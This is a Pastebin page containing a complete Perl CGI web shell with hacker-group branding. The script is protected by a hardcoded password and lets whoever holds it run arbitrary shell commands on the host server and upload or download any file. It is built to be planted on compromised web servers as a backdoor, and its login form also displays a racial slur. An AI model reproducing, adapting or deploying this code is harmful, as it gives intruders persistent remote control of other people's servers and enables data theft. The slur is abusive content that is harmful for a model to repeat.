API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 25th, 2018
188
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 14.62 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -I/usr/local/bandmain
  2. #------------------------------------------------------------------------------
  3. # xXx
  4. # xXx
  5. #------------------------------------------------------------------------------
  6. $Password = "kontol99";
  7.  
  8. $WinNT = 0;
  9. $NTCmdSep = "&";
  10. $UnixCmdSep = ";";
  11. $CommandTimeoutDuration = 15;
  12. $ShowDynamicOutput = 1;
  13.  
  14. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
  15.  
  16. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  17. $CmdPwd = ($WinNT ? "cd" : "pwd");
  18. $PathSep = ($WinNT ? "\\" : "/");
  19. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  20.  
  21. sub ReadParse
  22. {
  23.     local (*in) = @_ if @_;
  24.     local ($i, $loc, $key, $val);
  25.    
  26.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  27.  
  28.     if($ENV{'REQUEST_METHOD'} eq "GET")
  29.     {
  30.         $in = $ENV{'QUERY_STRING'};
  31.     }
  32.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
  33.     {
  34.         binmode(STDIN) if $MultipartFormData & $WinNT;
  35.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  36.     }
  37.  
  38.     # handle file upload data
  39.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  40.     {
  41.         $Boundary = '--'.$1; # please refer to RFC1867
  42.         @list = split(/$Boundary/, $in);
  43.         $HeaderBody = $list[1];
  44.         $HeaderBody =~ /\r\n\r\n|\n\n/;
  45.         $Header = $`;
  46.         $Body = $';
  47.         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  48.         $in{'filedata'} = $Body;
  49.         $Header =~ /filename=\"(.+)\"/;
  50.         $in{'f'} = $1;
  51.         $in{'f'} =~ s/\"//g;
  52.         $in{'f'} =~ s/\s//g;
  53.  
  54.         # parse trailer
  55.         for($i=2; $list[$i]; $i++)
  56.         {
  57.             $list[$i] =~ s/^.+name=$//;
  58.             $list[$i] =~ /\"(\w+)\"/;
  59.             $key = $1;
  60.             $val = $';
  61.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  62.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  63.             $in{$key} = $val;
  64.         }
  65.     }
  66.     else # standard post data (url encoded, not multipart)
  67.     {
  68.         @in = split(/&/, $in);
  69.         foreach $i (0 .. $#in)
  70.         {
  71.             $in[$i] =~ s/\+/ /g;
  72.             ($key, $val) = split(/=/, $in[$i], 2);
  73.             $key =~ s/%(..)/pack("c", hex($1))/ge;
  74.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  75.             $in{$key} .= "\0" if (defined($in{$key}));
  76.             $in{$key} .= $val;
  77.         }
  78.     }
  79. }
  80.  
  81. sub PrintPageHeader
  82. {
  83.     $EncodedCurrentDir = $CurrentDir;
  84.     $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  85.     print "Content-type: text/html\n\n";
  86.     print <<END;
  87. <html>
  88. <head>
  89. <title>BAC0T!</title>
  90. $HtmlMetaHeader
  91.  
  92. </head>
  93. <body onLoad="document.f.@_.focus()" bgcolor="#04511a" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#0668e8">
  94. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  95. <tr>
  96. <td bgcolor="#04511a" bordercolor="#04511a" align="center" width="1%">
  97. <b><font size="2">#</font></b></td>
  98. <td bgcolor="#04511a" width="98%"><font face="Verdana" size="2"><b>
  99. <b style="color:black;background-color:#f25e5e">WellPlayed</b> $ServerName </b></font></td>
  100. </tr>
  101. <tr>
  102. <td colspan="2" bgcolor="#04511a"><font face="Verdana" size="2">
  103.  
  104. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#0668e8">Upload</font></a> |
  105. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#0668e8">Download</font></a> |
  106. <a href="$ScriptLocation?a=logout"><font color="#0668e8">Logout</font></a> | <a href="https://fb.com/Xpecto.phtml" target="_blank"><font color="#0668e8">Ponorogo Hacker</font> |
  107. </font></td>
  108. </tr>
  109. </table>
  110. <font size="3">
  111. END
  112. }
  113.  
  114. #------------------------------------------------------------------------------
  115. # Prints the Login Screen
  116. #------------------------------------------------------------------------------
  117. sub PrintLoginScreen
  118. {
  119.     $Message = q$<pre><center><img border="0" src="https://i.pinimg.com/originals/63/93/c7/6393c775eb924f97b4e17b8119fd400f.png"></pre><br><br></font></center>
  120. $;
  121. #'
  122.     print <<END;
  123. <code>
  124.  
  125. Resolving $ServerName...<br>
  126. Trying $ServerName
  127. Connected to $ServerName<br>
  128. Good Game Well Played!!
  129. <code>$Message
  130. END
  131. }
  132.  
  133. #------------------------------------------------------------------------------
  134. # Prints the message that informs the user of a failed login
  135. #------------------------------------------------------------------------------
  136. sub PrintLoginFailedMessage
  137. {
  138.     print <<END;
  139. <code>
  140. <br>
  141. <h1>Password incorrect</h1>
  142. </code>
  143. END
  144. }
  145.  
  146. #------------------------------------------------------------------------------
  147. # Prints the HTML form for logging in
  148. #------------------------------------------------------------------------------
  149. sub PrintLoginForm
  150. {
  151.     print <<END;
  152. <code>
  153.  
  154. <form name="f" method="POST" action="$ScriptLocation">
  155. <input type="hidden" name="a" value="login">
  156. </font>
  157. <font size="3">
  158. user: <b style="color:black;background-color:#f25e5e">Nigga</b><br>
  159. password:</font><font color="#009900" size="3"><input type="password" name="p">
  160. <input type="submit" value="Enter">
  161. </form>
  162. </code>
  163. END
  164. }
  165.  
  166. #------------------------------------------------------------------------------
  167. # Prints the footer for the HTML Page
  168. #------------------------------------------------------------------------------
  169. sub PrintPageFooter
  170. {
  171.     print "</font></body></html>";
  172. }
  173.  
  174. #------------------------------------------------------------------------------
  175. # Retreives the values of all cookies. The cookies can be accesses using the
  176. # variable $Cookies{''}
  177. #------------------------------------------------------------------------------
  178. sub GetCookies
  179. {
  180.     @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  181.     foreach $cookie(@httpcookies)
  182.     {
  183.         ($id, $val) = split(/=/, $cookie);
  184.         $Cookies{$id} = $val;
  185.     }
  186. }
  187.  
  188. #------------------------------------------------------------------------------
  189. # Prints the screen when the user logs out
  190. #------------------------------------------------------------------------------
  191. sub PrintLogoutScreen
  192. {
  193.     print "<code>Connection closed by foreign host.<br><br></code>";
  194. }
  195.  
  196. #------------------------------------------------------------------------------
  197. # Logs out the user and allows the user to login again
  198. #------------------------------------------------------------------------------
  199. sub PerformLogout
  200. {
  201.     print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  202.     &PrintPageHeader("p");
  203.     &PrintLogoutScreen;
  204.  
  205.     &PrintLoginScreen;
  206.     &PrintLoginForm;
  207.     &PrintPageFooter;
  208. }
  209.  
  210. sub PerformLogin
  211. {
  212.     if($LoginPassword eq $Password) # password matched
  213.     {
  214.         print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  215.         &PrintPageHeader("c");
  216.         &PrintCommandLineInputForm;
  217.         &PrintPageFooter;
  218.     }
  219.     else # password didn't match
  220.     {
  221.         &PrintPageHeader("p");
  222.         &PrintLoginScreen;
  223.         if($LoginPassword ne "") # some password was entered
  224.         {
  225.             &PrintLoginFailedMessage;
  226.  
  227.         }
  228.         &PrintLoginForm;
  229.         &PrintPageFooter;
  230.     }
  231. }
  232.  
  233. sub PrintCommandLineInputForm
  234. {
  235.     $Prompt = $WinNT ? "$CurrentDir> " : "[users\@$ServerName $CurrentDir]\$ ";
  236.     print <<END;
  237. <code>
  238. <form name="f" method="POST" action="$ScriptLocation">
  239. <input type="hidden" name="a" value="command">
  240. <input type="hidden" name="d" value="$CurrentDir">
  241. $Prompt
  242. <input type="text" name="c">
  243. <input type="submit" value="Enter">
  244. </form>
  245. </code>
  246.  
  247. END
  248. }
  249.  
  250. #------------------------------------------------------------------------------
  251. # Prints the HTML form that allows the user to download files
  252. #------------------------------------------------------------------------------
  253. sub PrintFileDownloadForm
  254. {
  255.     $Prompt = $WinNT ? "$CurrentDir> " : "[users\@$ServerName $CurrentDir]\$ ";
  256.     print <<END;
  257. <code>
  258. <form name="f" method="POST" action="$ScriptLocation">
  259. <input type="hidden" name="d" value="$CurrentDir">
  260. <input type="hidden" name="a" value="download">
  261. $Prompt download<br><br>
  262. Filename: <input type="text" name="f" size="35"><br><br>
  263. Download: <input type="submit" value="Begin">
  264. </form>
  265. </code>
  266. END
  267. }
  268.  
  269. #------------------------------------------------------------------------------
  270. # Prints the HTML form that allows the user to upload files
  271. #------------------------------------------------------------------------------
  272. sub PrintFileUploadForm
  273. {
  274.     $Prompt = $WinNT ? "$CurrentDir> " : "[users\@$ServerName $CurrentDir]\$ ";
  275.     print <<END;
  276. <code>
  277.  
  278. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  279. $Prompt upload<br><br>
  280. Filename: <input type="file" name="f" size="35"><br><br>
  281. Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
  282. Overwrite if it Exists<br><br>
  283. Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
  284. <input type="hidden" name="d" value="$CurrentDir">
  285. <input type="hidden" name="a" value="upload">
  286. </form>
  287. </code>
  288. END
  289. }
  290.  
  291. sub CommandTimeout
  292. {
  293.     if(!$WinNT)
  294.     {
  295.         alarm(0);
  296.         print <<END;
  297. </xmp>
  298.  
  299. <code>
  300. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  301. <br>Killed it!
  302. END
  303.         &PrintCommandLineInputForm;
  304.         &PrintPageFooter;
  305.         exit;
  306.     }
  307. }
  308.  
  309. sub ExecuteCommand
  310. {
  311.     if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  312.     {
  313.         # we change the directory internally. The output of the
  314.         # command is not displayed.
  315.        
  316.         $OldDir = $CurrentDir;
  317.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  318.         chop($CurrentDir = `$Command`);
  319.         &PrintPageHeader("c");
  320.         $Prompt = $WinNT ? "$OldDir> " : "[users\@$ServerName $OldDir]\$ ";
  321.         print "$Prompt $RunCommand";
  322.     }
  323.     else # some other command, display the output
  324.     {
  325.         &PrintPageHeader("c");
  326.         $Prompt = $WinNT ? "$CurrentDir> " : "[users\@$ServerName $CurrentDir]\$ ";
  327.         print "$Prompt $RunCommand<xmp>";
  328.         $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  329.         if(!$WinNT)
  330.         {
  331.             $SIG{'ALRM'} = \&CommandTimeout;
  332.             alarm($CommandTimeoutDuration);
  333.         }
  334.         if($ShowDynamicOutput) # show output as it is generated
  335.         {
  336.             $|=1;
  337.             $Command .= " |";
  338.             open(CommandOutput, $Command);
  339.             while(<CommandOutput>)
  340.             {
  341.                 $_ =~ s/(\n|\r\n)$//;
  342.                 print "$_\n";
  343.             }
  344.             $|=0;
  345.         }
  346.         else # show output after command completes
  347.         {
  348.             print `$Command`;
  349.         }
  350.         if(!$WinNT)
  351.         {
  352.             alarm(0);
  353.         }
  354.         print "</xmp>";
  355.     }
  356.     &PrintCommandLineInputForm;
  357.     &PrintPageFooter;
  358. }
  359.  
  360. sub PrintDownloadLinkPage
  361. {
  362.     local($FileUrl) = @_;
  363.     if(-e $FileUrl) # if the file exists
  364.     {
  365.         # encode the file link so we can send it to the browser
  366.         $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  367.         $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  368.         $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  369.         &PrintPageHeader("c");
  370.         print <<END;
  371. <code>
  372.  
  373. Sending File $TransferFile...<br>
  374. If the download does not start automatically,
  375. <a href="$DownloadLink">Click Here</a>.
  376. END
  377.         &PrintCommandLineInputForm;
  378.         &PrintPageFooter;
  379.     }
  380.     else # file doesn't exist
  381.     {
  382.         &PrintPageHeader("f");
  383.         print "Failed to download $FileUrl: $!";
  384.         &PrintFileDownloadForm;
  385.         &PrintPageFooter;
  386.     }
  387. }
  388.  
  389.  
  390. sub SendFileToBrowser
  391. {
  392.     local($SendFile) = @_;
  393.     if(open(SENDFILE, $SendFile)) # file opened for reading
  394.     {
  395.         if($WinNT)
  396.         {
  397.             binmode(SENDFILE);
  398.             binmode(STDOUT);
  399.         }
  400.         $FileSize = (stat($SendFile))[7];
  401.         ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
  402.         print "Content-Type: application/x-unknown\n";
  403.         print "Content-Length: $FileSize\n";
  404.         print "Content-Disposition: attachment; filename=$1\n\n";
  405.         print while(<SENDFILE>);
  406.         close(SENDFILE);
  407.     }
  408.     else # failed to open file
  409.     {
  410.         &PrintPageHeader("f");
  411.         print "Failed to download $SendFile: $!";
  412.         &PrintFileDownloadForm;
  413.  
  414.         &PrintPageFooter;
  415.     }
  416. }
  417.  
  418.  
  419. sub BeginDownload
  420. {
  421.     # get fully qualified path of the file to be downloaded
  422.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  423.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  424.     {
  425.         $TargetFile = $TransferFile;
  426.     }
  427.     else # path is relative
  428.     {
  429.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  430.         $TargetFile .= $PathSep.$TransferFile;
  431.     }
  432.  
  433.     if($Options eq "go") # we have to send the file
  434.     {
  435.         &SendFileToBrowser($TargetFile);
  436.     }
  437.     else # we have to send only the link page
  438.     {
  439.         &PrintDownloadLinkPage($TargetFile);
  440.     }
  441. }
  442.  
  443. sub UploadFile
  444. {
  445.     # if no file is specified, print the upload form again
  446.     if($TransferFile eq "")
  447.     {
  448.         &PrintPageHeader("f");
  449.         &PrintFileUploadForm;
  450.         &PrintPageFooter;
  451.         return;
  452.     }
  453.     &PrintPageHeader("c");
  454.  
  455.     # start the uploading process
  456.     print "Uploading to $TransferFile to $CurrentDir ...<br>";
  457.  
  458.     # get the fullly qualified pathname of the file to be created
  459.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  460.     $TransferFile =~ m!([^/^\\]*)$!;
  461.     $TargetName .= $PathSep.$1;
  462.  
  463.     $TargetFileSize = length($in{'filedata'});
  464.     # if the file exists and we are not supposed to overwrite it
  465.     if(-e $TargetName && $Options ne "overwrite")
  466.     {
  467.         print "Failed: Destination file already exists.<br>";
  468.     }
  469.     else # file is not present
  470.     {
  471.         if(open(UPLOADFILE, ">$TargetName"))
  472.         {
  473.             binmode(UPLOADFILE) if $WinNT;
  474.             print UPLOADFILE $in{'filedata'};
  475.             close(UPLOADFILE);
  476.             print "Transfered $TargetFileSize Bytes.<br>";
  477.             print "File Path: $TargetName<br>";
  478.         }
  479.         else
  480.         {
  481.             print "Failed: $!<br>";
  482.         }
  483.     }
  484.     print "";
  485.     &PrintCommandLineInputForm;
  486.  
  487.     &PrintPageFooter;
  488. }
  489.  
  490. sub DownloadFile
  491. {
  492.     # if no file is specified, print the download form again
  493.     if($TransferFile eq "")
  494.     {
  495.         &PrintPageHeader("f");
  496.         &PrintFileDownloadForm;
  497.         &PrintPageFooter;
  498.         return;
  499.     }
  500.    
  501.     # get fully qualified path of the file to be downloaded
  502.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  503.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  504.     {
  505.         $TargetFile = $TransferFile;
  506.     }
  507.     else # path is relative
  508.     {
  509.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  510.         $TargetFile .= $PathSep.$TransferFile;
  511.     }
  512.  
  513.     if($Options eq "go") # we have to send the file
  514.     {
  515.         &SendFileToBrowser($TargetFile);
  516.     }
  517.     else # we have to send only the link page
  518.     {
  519.         &PrintDownloadLinkPage($TargetFile);
  520.     }
  521. }
  522.  
  523. #------------------------------------------------------------------------------
  524. # Main Program - Execution Starts Here
  525. #------------------------------------------------------------------------------
  526. &ReadParse;
  527. &GetCookies;
  528.  
  529. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  530. $ServerName = $ENV{'SERVER_NAME'};
  531. $LoginPassword = $in{'p'};
  532. $RunCommand = $in{'c'};
  533. $TransferFile = $in{'f'};
  534. $Options = $in{'o'};
  535.  
  536. $Action = $in{'a'};
  537. $Action = "login" if($Action eq ""); # no action specified, use default
  538.  
  539. # get the directory in which the commands will be executed
  540. $CurrentDir = $in{'d'};
  541. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  542.  
  543. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
  544.  
  545. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  546. {
  547.     &PerformLogin;
  548.  
  549. }
  550. elsif($Action eq "command") # user wants to run a command
  551. {
  552.     &ExecuteCommand;
  553. }
  554. elsif($Action eq "upload") # user wants to upload a file
  555. {
  556.     &UploadFile;
  557. }
  558. elsif($Action eq "download") # user wants to download a file
  559. {
  560.     &DownloadFile;
  561. }
  562. elsif($Action eq "logout") # user wants to logout
  563. {
  564.     &PerformLogout;
  565. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!